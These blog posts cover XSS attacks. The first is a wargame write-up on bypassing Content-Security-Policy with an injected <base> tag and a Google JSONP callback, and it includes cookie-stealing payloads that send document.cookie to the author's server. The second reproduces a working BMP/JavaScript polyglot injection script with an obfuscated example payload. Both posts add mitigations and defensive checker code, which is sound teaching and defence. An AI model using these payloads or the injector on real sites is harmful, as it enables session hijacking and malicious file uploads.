Showing posts with label xss.

Saturday, 24 April 2021

CSP bypass with wargame

What is Content-Security-Policy (CSP)?

Content Security Policy (CSP) is an added security layer that helps to detect and mitigate certain types of attacks, including Cross-Site Scripting (XSS) and data injection attacks.

However, a badly configured CSP can be bypassed outright, leaving the page as exposed as if there were no policy at all.

Below are two such misconfigurations, illustrated with wargame problems.

#1. Bypass CSP script-src 'nonce-random'.

In the first problem, the response carries a CSP whose script-src is a single 'nonce-...' source:
HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 22:01:38 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Security-Policy: script-src 'nonce-uMiBg4W3wGgp8JQnJG2TL7WLGE8=';
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 133
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
I first tried a CSS attribute-selector brute force to leak the nonce value, but it did not work; modern browsers hide the nonce content attribute once the script element has been parsed, which is why the DOM snapshot below shows nonce="". Looking at the problem's source again, I noticed that it loads an internal script, script.js, through a relative path:
<h2>you can inject anything</h2>
<div id="injected">
foo
</div>
<script nonce="" src="/script.js" umibg4w3wggp8jqnjg2tl7wlge8=""></script>
Yes! Now I have a way to load script.js from my own server with a <base> tag: the policy sets no base-uri, so an injected <base href> changes the origin against which the relative src="/script.js" is resolved, and the server-supplied nonce on that <script> tag still satisfies the CSP.

I can steal the admin's cookie with this payload:
<base href='http://[my server IP]/'>

script.js on my server (the browser fetches it from my host because of the injected <base>):
location.href='http://[my server IP]/?c='+encodeURIComponent(document.cookie);

#2. Bypass CSP script-src "https://*.google.com"

In the second problem, the CSP is script-src https://*.google.com/:

HTTP/1.1 200 OK
Date: Fri, 23 Apr 2021 22:52:02 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Security-Policy: script-src https://*.google.com/;
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 90
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Only Google hosts may serve scripts. Many sites load Google APIs, so a wildcard allowlist like this is a common real-world CSP mistake; the trouble is that *.google.com also covers endpoints that reflect attacker-controlled text into a script response, so the wildcard trusts far more than the one API the site actually needs.

I bypassed this CSP with this payload:
<script src=https://accounts.google.com/o/oauth2/revoke?callback=var/**/a%3d%27http://[my server ip]%27;location.replace(a%252bdocument.cookie);></script>
The payload abuses a JSONP endpoint on accounts.google.com: the callback parameter is reflected into the JavaScript response, so the injected callback text runs in the page from an origin the policy trusts. The /**/ stands in for a space, and the + is double-encoded (%252b) so it reaches the endpoint intact.

How to mitigate this problem? Allowlist only the specific host you actually load from, for example script-src https://apis.google.com, rather than a wildcard. Better still, prefer a nonce- or hash-based policy with 'strict-dynamic' over host allowlists, since any allowlisted host that exposes a JSONP endpoint remains a bypass, and set base-uri as well, which closes the <base> trick from the first problem.
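As an added example, not from the original post, the following Python checker parses a Content-Security-Policy value and flags both mistakes from this write-up: a nonce policy without base-uri, and a host allowlist containing wildcards or hosts that serve JSONP. The JSONP_HOSTS list is an assumption made for the example (accounts.google.com from the payload above plus www.google.com, which CSP bypass lists commonly cite); extend it for your own allowlists.

```python
import re

# Assumption for this example: hosts known to expose JSONP-style callback endpoints.
# accounts.google.com is the one abused in the post; www.google.com is commonly cited too.
JSONP_HOSTS = ("accounts.google.com", "www.google.com")

_SCHEME_SOURCE = re.compile(r"^[a-z][a-z0-9+.-]*:$", re.I)              # e.g. https:
_HOST_SOURCE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://)?([^/:]+)", re.I)  # host part of https://*.google.com/
_NONCE_OR_HASH = re.compile(r"^'(nonce-|sha(256|384|512)-)")


def parse_csp(header):
    """'script-src a b; base-uri c' -> {'script-src': ['a', 'b'], 'base-uri': ['c']}.
    Like a browser, keep the first occurrence of a repeated directive and ignore the rest."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() not in policy:
            policy[tokens[0].lower()] = tokens[1:]
    return policy


def host_matches(pattern, host):
    """CSP host matching: '*.google.com' covers every subdomain but not google.com itself."""
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])
    return pattern == host


def check_script_policy(header):
    """Return the weaknesses found in the script-src of a CSP header value ([] if none)."""
    policy = parse_csp(header)
    script_src = policy.get("script-src", policy.get("default-src", []))
    if not script_src:
        return ["no script-src or default-src: script execution is unrestricted"]
    findings = []
    uses_nonce_or_hash = any(_NONCE_OR_HASH.match(s) for s in script_src)
    strict_dynamic = "'strict-dynamic'" in script_src

    if "'unsafe-inline'" in script_src and not uses_nonce_or_hash:
        findings.append("'unsafe-inline' without a nonce or hash: any injected <script> runs")
    # Problem #1 of the post: a nonced <script src="/script.js"> and no base-uri, so an injected
    # <base href> resolves the relative URL against an attacker host and the nonce still applies.
    if "base-uri" not in policy:
        findings.append("base-uri missing: an injected <base href> redirects relative script URLs"
                        + (" (the nonce on an existing <script> tag still applies)" if uses_nonce_or_hash else ""))
    if "object-src" not in policy and "default-src" not in policy:
        findings.append("object-src missing: plugin content (<object>/<embed>) is unrestricted")
    # Problem #2 of the post: host allowlists. A wildcard trusts every subdomain, and any trusted
    # host that serves JSONP reflects its callback parameter as script under that origin.
    # With 'strict-dynamic' a CSP3 browser ignores host sources, so they are not reported.
    for src in script_src:
        if src.startswith("'") or strict_dynamic:
            continue
        if _SCHEME_SOURCE.match(src):
            findings.append("scheme source %s: every host on that scheme may serve scripts" % src)
            continue
        m = _HOST_SOURCE.match(src)
        if not m:
            continue
        host = m.group(1).lower()
        jsonp = [h for h in JSONP_HOSTS if host_matches(host, h)]
        if host == "*":
            findings.append("%s: any host may serve scripts" % src)
        elif host.startswith("*."):
            findings.append("wildcard host %s: every subdomain is trusted%s"
                            % (src, ", including JSONP endpoints on " + ", ".join(jsonp) if jsonp else ""))
        elif jsonp:
            findings.append("%s serves JSONP: callback= reflects attacker script under a trusted origin" % src)
    if not uses_nonce_or_hash and any(not s.startswith("'") for s in script_src):
        findings.append("host allowlist without nonce/hash: prefer a nonce-based policy with 'strict-dynamic'")
    return findings


def strict_policy(nonce):
    """The policy shape Google's CSP guidance recommends instead of host allowlists."""
    return "script-src 'nonce-%s' 'strict-dynamic'; object-src 'none'; base-uri 'none';" % nonce


if __name__ == "__main__":
    # The two headers from the write-up, then the recommended replacement
    for h in ("script-src 'nonce-uMiBg4W3wGgp8JQnJG2TL7WLGE8=';",
              "script-src https://*.google.com/;",
              strict_policy("uMiBg4W3wGgp8JQnJG2TL7WLGE8=")):
        print(h)
        for finding in check_script_policy(h) or ["ok"]:
            print("  - " + finding)
```

Run it against the two headers above and the first is flagged for the missing base-uri, the second for the wildcard that pulls in accounts.google.com; the strict policy returned by strict_policy() produces no findings. The checker deliberately reports host sources only when 'strict-dynamic' is absent, because a CSP3 browser ignores them once that keyword is present.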

~ kerz

Reference:
Content Security Policy (CSP): https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
Secure CSP: https://developers.google.com/web/fundamentals/security/csp

Monday, 31 March 2014

BMP INJECTION Python.

This script injects JavaScript into a BMP file so that the result is both an image and a script: the file starts with BM, the file-size field is overwritten with the bytes of /*, and */=1; is placed in front of the payload, so a browser that loads the file through <script src> sees BM/*...*/=1;<payload> and runs only the payload.
If you need to test whether an upload handler accepts a BMP that carries JavaScript, you could use bmpinjection.py (by Marco Ramilli, as the header notes).

#!/usr/bin/env python2
#============================================================================================================#
#======= Simply injects a JavaScript Payload into a BMP. ====================================================#
#======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
#======= Author: marcoramilli.blogspot.com ==================================================================#
#======= Version: PoC (don't even think to use it in development env.) ======================================#
#======= Disclaimer: ========================================================================================#
#THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
#IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
#WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
#DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
#INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
#(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
#SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
#HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
#STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
#IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
#POSSIBILITY OF SUCH DAMAGE.
#===========================================================================================================#
import argparse
import struct

#---------------------------------------------------------
def _le32(num):
    """
    Encodes an integer as the 4-byte little-endian field used by BMP headers
    """
    return struct.pack('<I', num)

#---------------------------------------------------------
#Example payload: "var _0xe428=[\"" + b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"];alert(_0xe428[0]);"
def _generate_and_write_to_file(payload, fname):
    """
    Generates a fake but valid BMP carrying the script.
    A JavaScript engine reads the file as   BM /* ...header bytes... */ = 1; <payload>
    so the whole header is a comment and only the payload runs.
    """
    header = (b'\x42\x4D'               #Signature BM (also a valid JS identifier)
              b'\x2F\x2A\x00\x00'       #Header File size, but encoded as /* <-- Yes it's a valid header, and it opens the JS comment
              b'\x00\x00\x00\x00'       #Reserved
              b'\x00\x00\x00\x00'       #bitmap data offset
              + _le32(len(payload)) +   #bitmap header size (fixed 4-byte field)
              b'\x00\x00\x00\x14'       #width 20pixel .. it's up to you
              b'\x00\x00\x00\x14'       #height 20pixel .. it's up to you
              b'\x00\x00'               #nb_plan
              b'\x00\x00'               #nb per pixel
              b'\x00\x10\x00\x00'       #compression type
              b'\x00\x00\x00\x00'       #image size .. its ignored
              b'\x00\x00\x00\x01'       #Horizontal resolution
              b'\x00\x00\x00\x01'       #Vertical resolution
              b'\x00\x00\x00\x00'       #number of colors
              b'\x00\x00\x00\x00'       #number important colors
              b'\x00\x00\x00\x80'       #palette colors to be compliant
              b'\x00\x80\xff\x80'       #palette colors to be compliant
              b'\x80\x00\xff\x2A'       #palette colors to be compliant; the last byte is *
              b'\x2F\x3D\x31\x3B'       #/=1;  -> together "*/=1;" closes the comment, so the script starts with BM=1;
              )
    # I made this explicit, step by step .
    with open(fname, "wb") as f:
        f.write(header)
        f.write(payload)
    return True

#---------------------------------------------------------
def _generate_launching_page(f):
    """
    Creates the HTML launching page: the same file is loaded as an image and as a script
    """
    htmlpage = """<html>
<head><title>Opening an image</title></head>
<body>
<img src="%s">
<script src="%s"></script>
</body>
</html>
""" % (f, f)
    with open("run.html", "wb") as html:
        html.write(htmlpage)
    return True

#---------------------------------------------------------
def _inject_into_file(payload, fname):
    """
    Injects the payload into an existing BMP
    NOTE: any */ inside the image data would close the JS comment early, so it is
    blanked out (a couple of pixels may change). The file-size field is overwritten
    with /*, which most decoders ignore.
    """
    with open(fname, "rb") as f:
        b = f.read()
    b = b.replace(b'\x2A\x2F', b'\x00\x00')   # replace() returns a new string, it does not edit in place
    b = b[:2] + b'\x2F\x2A' + b[4:]            # bytes 2-3, the low half of the file size, become /*
    with open(fname, "wb") as f:
        f.write(b)
        f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')   # \xFF*/=1;  closes the comment -> BM=1;
        f.write(payload)
    return True


#---------------------------------------------------------
if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("filename", help="the bmp file name to be generated/or infected")
    parser.add_argument("js_payload", help="the payload to be injected. For example: \"alert(\"test\");\"")
    parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
    args = parser.parse_args()
    print("""
|=====================================================================================================|
| [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.         |
| It is the end user's responsibility to obey all applicable local, state and federal laws.           |
| Authors assume no liability and are not responsible for any misuse or damage caused by this program |
|=====================================================================================================|
""")
    if args.inject_to_existing_bmp:
        _inject_into_file(args.js_payload, args.filename)
    else:
        _generate_and_write_to_file(args.js_payload, args.filename)

    _generate_launching_page(args.filename)
    print("[+] Finished!")

Example run (Windows, Python 2.7), injecting a payload into an existing 1.bmp; the \x escapes are left for JavaScript to decode, so the script source hides the string document.cookie:
c:\Python27\python.exe bmpinject.py -i 1.bmp "var _0x9c4c=\"\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x63\x6f\x6f\x6b\x69\x65\"; function Msgbox(_0xccb4x3){alert(eval(_0xccb4x3));};Msgbox(_0x9c4c);"
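As an added example (not part of the original post or of the script above), here is a strict BMP validator an upload handler could run to reject such polyglots. It checks that the file-size field, the DIB header fields and the pixel-data offset describe exactly the bytes present, so a file whose size field spells /* or whose tail is a script payload fails. The sample bitmaps and payloads are constructed inline for the example; make_polyglot and append_payload imitate the two modes of the script above and are not its code.

```python
import struct

BITMAPFILEHEADER = "<2sIHHI"     # signature, file size, reserved, reserved, pixel data offset
BITMAPINFOHEADER = "<IiiHHII"    # DIB size, width, height, planes, bpp, compression, image size
ACCEPTED_DIB_SIZES = (40, 52, 56, 108, 124)   # BITMAPINFOHEADER and its V2..V5 extensions


def validate_bmp(data):
    """Return [] when the headers describe exactly the bytes present, else the problems found."""
    problems = []
    if len(data) < 14 + 40:
        return ["file shorter than a BMP file header plus BITMAPINFOHEADER"]
    magic, file_size, _r1, _r2, pixel_offset = struct.unpack_from(BITMAPFILEHEADER, data, 0)
    if magic != b"BM":
        problems.append("missing BM signature")
    if file_size != len(data):   # the polyglot stores the bytes of "/*" here, which reads as 0x2A2F
        problems.append("file size field %d does not match actual size %d" % (file_size, len(data)))
    dib_size, width, height, planes, bpp, compression, _image_size = struct.unpack_from(BITMAPINFOHEADER, data, 14)
    if dib_size not in ACCEPTED_DIB_SIZES:
        problems.append("unexpected DIB header size %d" % dib_size)
    if not (0 < width <= 1 << 15 and 0 < abs(height) <= 1 << 15):
        problems.append("implausible dimensions %dx%d" % (width, height))
    if planes != 1:
        problems.append("planes must be 1, got %d" % planes)
    if bpp not in (1, 4, 8, 16, 24, 32):
        problems.append("unsupported bits per pixel %d" % bpp)
    if compression != 0:
        problems.append("only uncompressed (BI_RGB) bitmaps are accepted")
    if problems:
        return problems
    # Rows are padded to 4 bytes; the pixel data must start after the headers and end the file,
    # because trailing bytes the structure does not account for are where a script payload sits.
    row_bytes = ((width * bpp + 31) // 32) * 4
    expected = row_bytes * abs(height)
    if pixel_offset < 14 + dib_size or pixel_offset + expected != len(data):
        problems.append("pixel data (offset %d, %d bytes) does not cover the %d-byte file"
                        % (pixel_offset, expected, len(data)))
    return problems


def make_bmp(width, height, bgr=b"\xff\x00\x00"):
    """Constructed sample: a minimal uncompressed 24-bit BMP filled with one colour."""
    row = bgr * width
    row += b"\0" * ((4 - len(row) % 4) % 4)
    pixels = row * height
    file_header = struct.pack(BITMAPFILEHEADER, b"BM", 14 + 40 + len(pixels), 0, 0, 54)
    dib_header = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0, len(pixels), 2835, 2835, 0, 0)
    return file_header + dib_header + pixels


def make_polyglot(payload=b"alert(document.domain)"):
    """Constructed sample in the spirit of the generator mode: a JS engine reads it as
    BM/*...*/=1;<payload>, while the size field holds 0x2A2F and the DIB fields are junk."""
    return (b"BM" + b"/*\0\0" + b"\0" * 8 + struct.pack("<I", len(payload))
            + b"\0" * 40 + b"*/=1;" + payload)


def append_payload(bmp, payload=b"alert(1)"):
    """Constructed sample in the spirit of the -i mode (without the */ scrubbing):
    overwrite bytes 2-3 with /* and append the closing marker plus the script."""
    return bmp[:2] + b"/*" + bmp[4:] + b"\xff*/=1;" + payload


if __name__ == "__main__":
    for name, blob in (("genuine 2x2 bitmap", make_bmp(2, 2)),
                       ("generated polyglot", make_polyglot()),
                       ("infected bitmap", append_payload(make_bmp(2, 2)))):
        print("%-20s %s" % (name, validate_bmp(blob) or ["ok"]))
```

The check is deliberately strict about trailing bytes: a decoder happily renders an image with junk after the pixel data, and that junk is exactly where the script lives. The browser side of the trick also needs the upload to be loadable through <script src>; serving uploads with their real image Content-Type and X-Content-Type-Options: nosniff makes browsers refuse to execute a script response whose MIME type is not a JavaScript type, which closes the launching page shown above.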